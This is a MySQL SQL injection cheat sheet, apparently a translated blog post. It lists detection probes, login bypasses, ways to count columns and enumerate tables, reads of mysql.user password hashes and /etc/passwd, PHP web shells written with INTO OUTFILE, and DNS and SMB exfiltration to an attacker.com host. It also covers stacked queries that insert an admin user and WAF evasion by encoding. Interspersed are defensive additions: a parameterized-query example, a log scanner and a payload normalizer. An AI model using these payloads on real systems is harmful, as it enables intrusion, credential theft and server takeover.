Submitted data containing "and" throws an error_Some database injection tricks for MySQL


Some database injection tricks - MySQL

Default databases

mysql  Requires root privileges

information_schema  Available in version 5 and later

Testing for injection

False means the query is invalid (MySQL syntax error / empty page content / page differs from the original)

True means the query is valid (page content matches the original)

String-based

Vulnerable statement:

select * from table where id = '1';

'     False

''    True

"     False

""    True

\     False

\\    True

Examples:

SELECT * FROM Articles WHERE id = '1''';

SELECT 1 FROM dual WHERE 1 = '1'''''''''''''UNION SELECT '2';

Numeric

Vulnerable statement:

SELECT * FROM Table WHERE id = 1;

AND 1      True

AND 0      False

AND true   True

AND false  False

1-false    Returns 1 if vulnerable

1-true     Returns 0 if vulnerable

1*56       Returns 56 if vulnerable

1*56       Returns 1 if not vulnerable

Example:

SELECT * FROM Users WHERE id = 3-2;

Notes:

true is equivalent to 1.

false is equivalent to 0.


Login form

Vulnerable statement:

SELECT * FROM Table WHERE username = '';

' OR '1

' OR 1 -- -

" OR "" = "

" OR 1 = 1 -- -

'='

'LIKE'

'=0--+

Example:

SELECT * FROM Users WHERE username = 'Mike' AND password = '' OR '' = '';
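As an added example (not from the original post), the login statement above written two ways: built by string concatenation, which lets the page's ' OR '' = ' payload rewrite the WHERE clause, and with bound parameters, which keeps the input as data. It assumes Python's bundled sqlite3 as a stand-in for MySQL; the Users table and its row are constructed.

```python
import sqlite3

# sqlite3 stands in for MySQL here because it ships with Python; the two queries
# below have the same shape on both engines. Table and row are constructed.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO Users VALUES (1, 'Mike', 'correct-horse')")
    return conn

def login_vulnerable(conn, username, password):
    # String concatenation: a quote in the input closes the literal and the rest
    # of the input is parsed as SQL, which is exactly the page's login example.
    sql = ("SELECT * FROM Users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()

def login_parameterized(conn, username, password):
    # Placeholders: values travel separately from the statement text, so a quote
    # in the input is data and the WHERE clause cannot change shape.
    sql = "SELECT * FROM Users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()

# The page's payload in the password field: ' OR '' = '
PAYLOAD = "' OR '' = '"
```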

Query comments

The following can be used to comment out the rest of the statement

#

/*

-- -

;%00

`

Examples:

SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password ='';

SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';

Getting the version

VERSION()

@@VERSION

@@GLOBAL.VERSION

Example:

SELECT * FROM Users WHERE id = '1' AND MID(VERSION(),1,1) = '5';

Inline comments

Example:

Vulnerable statement:

SELECT * FROM Users limit 1,{INJECTION POINT};

/*!50094eaea*/;   False - database version is 5.00.94 or later

/*!50096eaea*/;   True - database version is earlier than 5.00.96

/*!50095eaea*/;   False - database version is 5.00.95

Database credentials

Table:  mysql.user

Columns:  user, password

Current user:  user(), current_user(), current_user, system_user(), session_user()

Examples:

SELECT current_user;

SELECT CONCAT_WS(0x3A, user, password) FROM mysql.user WHERE user = 'root'-- (Privileged)


The password hashes can be cracked.


Database names

Tables:  information_schema.schemata, mysql.db

Columns:  schema_name, db

Current DB:  database(), schema()

Examples:

SELECT database();

SELECT schema_name FROM information_schema.schemata;

SELECT DISTINCT(db) FROM mysql.db;-- (Privileged)


Database hostname

Example:

SELECT @@hostname;

Getting tables and columns

Determining the number of columns

Via GROUP/ORDER BY

GROUP/ORDER BY n+1;

Note:

Keep increasing the number until the page errors

Example:

Vulnerable statement:

SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}';

1' ORDER BY 1--+   True

1' ORDER BY 2--+   True

1' ORDER BY 3--+   True

1' ORDER BY 4--+   False

-1' UNION SELECT 1,2,3--+   True (so there are three columns)

Via error (1)

GROUP/ORDER BY 1,2,3,4,5...

Example:

Vulnerable statement:

SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}'

1' GROUP BY 1,2,3,4,5--+   Unknown column '4' in 'group statement'

1' ORDER BY 1,2,3,4,5--+   Unknown column '4' in 'order clause'

Via error (2)

SELECT ... INTO var_list, var_list1, var_list2...

Example 1:

Vulnerable statement:

SELECT permission FROM Users WHERE id = {INJECTION POINT};

-1 UNION SELECT 1 INTO @,@,@   The used SELECT statements have a different number of columns

-1 UNION SELECT 1 INTO @,@     The used SELECT statements have a different number of columns

-1 UNION SELECT 1 INTO @       No error means the query uses 1 column

Example 2:

Vulnerable statement:

SELECT username, permission FROM Users limit 1,{INJECTION POINT};

1 INTO @,@,@   The used SELECT statements have a different number of columns

1 INTO @,@     No error means the query uses 2 columns

Via error (3)

AND (SELECT * FROM SOME_EXISTING_TABLE) = 1

Example:

Vulnerable statement:

SELECT permission FROM Users WHERE id = {INJECTION POINT};

1 AND (SELECT * FROM Users) = 1   Operand should contain 3 column(s)
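As an added example (not from the original post) from the detection side: the ORDER BY / GROUP BY climb, the INTO @,@ probe and the UNION SELECT that follows them leave a recognisable shape in a web server's access log. This scan runs over a constructed log sample in combined-log format and reports clients showing that shape; treating an HTTP 500 as the error that ends the climb is an assumption about how the application surfaces MySQL errors.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined-log style line: client IP, timestamp, request line, status code (constructed format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# Request shapes from the column-count section: ORDER/GROUP BY n, UNION SELECT, SELECT ... INTO @,@.
ORDER_BY = re.compile(r"\b(?:order|group)\s+by\s+(\d+)", re.I)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
INTO_VARS = re.compile(r"\binto\s+@", re.I)

def scan_log(lines, min_steps=3):
    """Return {ip: {"steps": [n, ...], "union": bool, "into": bool, "errors": int}}
    for each client whose requests look like column-count enumeration."""
    seen = defaultdict(lambda: {"steps": set(), "union": False, "into": False, "errors": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode twice so double-URL-encoded values surface; unquote_plus also turns '+'
        # into a space, which is how the trailing '--+' reaches MySQL as '-- '.
        query = unquote_plus(unquote_plus(m["path"]))
        rec, hit = seen[m["ip"]], False
        for n in ORDER_BY.findall(query):
            rec["steps"].add(int(n))
            hit = True
        if UNION_SELECT.search(query):
            rec["union"], hit = True, True
        if INTO_VARS.search(query):
            rec["into"], hit = True, True
        if hit and m["status"] == "500":      # the error that ends the ORDER BY climb
            rec["errors"] += 1
    flagged = {}
    for ip, rec in seen.items():
        # A climbing ORDER BY sequence, or an ORDER BY probe plus a UNION/INTO attempt, is the signature.
        if len(rec["steps"]) >= min_steps or (rec["steps"] and (rec["union"] or rec["into"])):
            flagged[ip] = {**rec, "steps": sorted(rec["steps"])}
    return flagged

# Constructed sample log: a benign client, an enumerating client, and a benign "order" parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /article.php?id=1 HTTP/1.1" 200 5123
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /article.php?id=1'%20ORDER%20BY%201--+ HTTP/1.1" 200 5123
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /article.php?id=1'%20ORDER%20BY%202--+ HTTP/1.1" 200 5123
198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /article.php?id=1'%20ORDER%20BY%203--+ HTTP/1.1" 200 5123
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /article.php?id=1'%20ORDER%20BY%204--+ HTTP/1.1" 500 312
198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /article.php?id=-1'%20UNION%20SELECT%201,2,3--+ HTTP/1.1" 200 5301
203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /list.php?sort=1&order=by HTTP/1.1" 200 900
""".splitlines()
```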

Retrieving tables

Union-based

UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;

Boolean-based

AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'

Error-based

AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))

(@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0);

AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));-- Available in 5.1.5

Retrieving columns

Union-based

UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'

Boolean-based

AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'

Error-based

AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))

(@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0);

AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));-- Available in MySQL 5.1.5

AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in MySQL 5.1

AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b) a)

AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b USING (SOME_EXISTING_COLUMN)) a)

LIMIT injection

Vulnerable statement:

SELECT username, permission FROM Users WHERE id = 1;

1 PROCEDURE ANALYSE()   Get the first column's name

1 LIMIT 1,1 PROCEDURE ANALYSE()   Get the second column's name

1 LIMIT 2,1 PROCEDURE ANALYSE()   Get the third column's name

Retrieving multiple tables/columns at once

SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,'[ ',table_schema,' ] >',table_name,' > ',column_name))))x

SELECT * FROM Users WHERE id = '-1' UNION SELECT 1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' >',column_name))))x), 4--+';

Output:

[ information_schema ] >CHARACTER_SETS >CHARACTER_SET_NAME

[ information_schema ] >CHARACTER_SETS >DEFAULT_COLLATE_NAME

[ information_schema ] >CHARACTER_SETS >DESCRIPTION

[ information_schema ] >CHARACTER_SETS >MAXLEN

[ information_schema ] >COLLATIONS >COLLATION_NAME

[ information_schema ] >COLLATIONS >CHARACTER_SET_NAME

[ information_schema ] >COLLATIONS > ID

[ information_schema ] >COLLATIONS >IS_DEFAULT

[ information_schema ] >COLLATIONS >IS_COMPILED

SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns

SELECT username FROM Users WHERE id = '-1' UNION SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns--+';

Output:

Table: talk_revisions

Column: revid

Table: talk_revisions

Column: userid

Table: talk_revisions

Column: user

Table: talk_projects

Column: priority

Querying information from the system columns

SELECT table_name FROM information_schema.columns WHERE column_name = 'username';

SELECT table_name FROM information_schema.columns WHERE column_name LIKE '%user%';

SELECT column_name FROM information_schema.columns WHERE table_name = 'Users';

SELECT column_name FROM information_schema.columns WHERE table_name LIKE '%user%';

Without single quotes

SELECT * FROM Users WHERE username = 0x61646D696E

SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)

String concatenation

SELECT 'a' 'd' 'mi' 'n';

SELECT CONCAT('a', 'd', 'm', 'i', 'n');

SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');

SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');

Conditional statements

CASE

IF()

IFNULL()

NULLIF()

SELECT IF(1=1, true, false);

SELECT CASE WHEN 1=1 THEN true ELSE false END;

Time-based checks

SLEEP()   MySQL 5

BENCHMARK()   MySQL 4/5

' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '

Privilege checks

Determine which users have the FILE privilege

SELECT file_priv FROM mysql.user WHERE user = 'username';   Root privileges required   MySQL 4/5

SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%';   No privileges required   MySQL 5

Reading files

Users with the FILE privilege can read files

LOAD_FILE()

SELECT LOAD_FILE('/etc/passwd');

SELECT LOAD_FILE(0x2F6574632F706173737764);

Writing files

Users with the FILE privilege can write files

INTO OUTFILE/DUMPFILE

SELECT ' system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';

http://localhost/shell.php?c=cat%20/etc/passwd

SELECT ' fwrite(fopen($_GET[f], \'w\'),file_get_contents($_GET[u])); ?>' INTO OUTFILE '/var/www/get.php'

http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt

Out-of-band data exfiltration

DNS

SELECT LOAD_FILE(CONCAT('\\\\foo.',(SELECT MID(version(),1,1)),'.attacker.com\\'));

SMB

' OR 1=1 INTO OUTFILE '\\\\attacker\\SMBshare\\output.txt

Stacked queries

SELECT * FROM Users WHERE ID=1 AND 1=0; INSERT INTO Users(username, password, priv) VALUES ('BobbyTables', 'kl20da$$','admin');

SELECT * FROM Users WHERE ID=1 AND 1=0; SHOW COLUMNS FROM Users;

Inline queries

MySQL allows a version number to be given after the exclamation mark. The syntax inside the comment is executed only when the server version is greater than or equal to that version number.

UNION SELECT /*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null--x*/0,null--+

SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/);

Obfuscation

The following characters can be used in place of a space

09, 0A, 0B, 0C, 0D, A0, 20

'%0A%09UNION%0CSELECT%A0NULL%20%23

Parentheses can also be used to avoid spaces

UNION(SELECT(column)FROM(table))

Symbols that can be used after AND/OR

20   Space

2B   +

2D   -

7E   ~

21   !

40   @

SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))

Using comments plus newlines

1'#AND 0--UNION# I am a comment!SELECT@tmp:=table_name x FROM--`information_schema`.tables LIMIT 1#

1'%23%0AAND 0--%0AUNION%23I am a comment!%0ASELECT@tmp:=table_name x FROM--%0A`information_schema`.tables LIMIT 1%23

VERSION/**/%A0 (/*comment*/)

URL encoding

SELECT %74able_%6eame FROM information_schema.tables;

Double URL encoding

SELECT %2574able_%256eame FROM information_schema.tables;

Unicode encoding

SELECT %u0074able_%u6eame FROM information_schema.tables;

Invalid hex encoding (ASP)

SELECT %tab%le_%na%me FROM information_schema.tables;
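As an added example, not from the original post, this normalizer undoes the tricks from the inline-query and obfuscation sections above (whitespace substitutes, parentheses instead of spaces, single and double URL encoding, %u encoding, and /*!nnnnn */ version comments, whose body MySQL does execute) before matching keywords, which is how a WAF rule or log review keeps seeing the keyword. The signature list is an assumed illustration, and the input is treated as a URL query-string value.

```python
import re
from urllib.parse import unquote_plus

# Whitespace substitutes listed on the page: 0x09 0x0A 0x0B 0x0C 0x0D 0xA0 0x20.
WS = re.compile("[\t\n\x0b\x0c\r\xa0 ]+")
UNICODE_PCT = re.compile(r"%u([0-9a-fA-F]{4})")                 # %u0074 -> 't'
VERSION_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)      # /*!50000 body */ -> body
PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)              # /* ... */ -> space
LINE_COMMENT = re.compile(r"(?:--(?=\s)|#).*?(?=\n|$)")          # '-- ' or '#' to end of line

def normalize(payload, rounds=2):
    """Canonicalise a query-string value the way MySQL would end up seeing it,
    so keyword matching survives the page's encoding, comment and whitespace tricks."""
    s = payload
    for _ in range(rounds):                      # plain and double URL encoding
        s = UNICODE_PCT.sub(lambda m: chr(int(m.group(1), 16)), s)
        s = unquote_plus(s, encoding="latin-1")  # keeps %A0 as U+00A0; '+' becomes a space
    s = VERSION_COMMENT.sub(r" \1 ", s)          # MySQL executes the body of /*!nnnnn ... */
    s = PLAIN_COMMENT.sub(" ", s)
    s = LINE_COMMENT.sub(" ", s)
    s = WS.sub(" ", s)
    s = re.sub(r"\s*([()])\s*", r" \1 ", s)      # UNION(SELECT(x)FROM(t)) -> UNION ( SELECT ( x ) ...
    return re.sub(r" {2,}", " ", s).strip().lower()

# Keyword shapes from this page, matched against the normalized text (assumed signature set).
SIGNATURES = [r"\bunion\s*\(?\s*select\b", r"\border by \d", r"\binformation_schema\b",
              r"\bload_file\b", r"\binto (?:outfile|dumpfile)\b", r"\b(?:sleep|benchmark) \("]

def matches(payload):
    """Return the signatures that fire on the normalized payload (empty list = none)."""
    s = normalize(payload)
    return [p for p in SIGNATURES if re.search(p, s)]
```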

Evading certain keywords

Spaces

information_schema . tables

Backticks

`information_schema`.`tables`

Comments

/*!information_schema.tables*/

Other

information_schema.partitions
information_schema.statistics
information_schema.key_column_usage
information_schema.table_constraints

Comparison and conditional operators

AND , &&
=
:=
BETWEEN ... AND ...
BINARY
&
~
|
^
CASE
DIV
/
<=>
=
>=
>
IS NOT NULL
IS NOT
IS NULL
IS
<<
<=
<
LIKE
-
% or MOD
NOT BETWEEN ... AND ...
!= , <>
NOT LIKE
NOT REGEXP
NOT , !
|| , OR
+
REGEXP
>>
RLIKE
SOUNDS LIKE
*
-
XOR
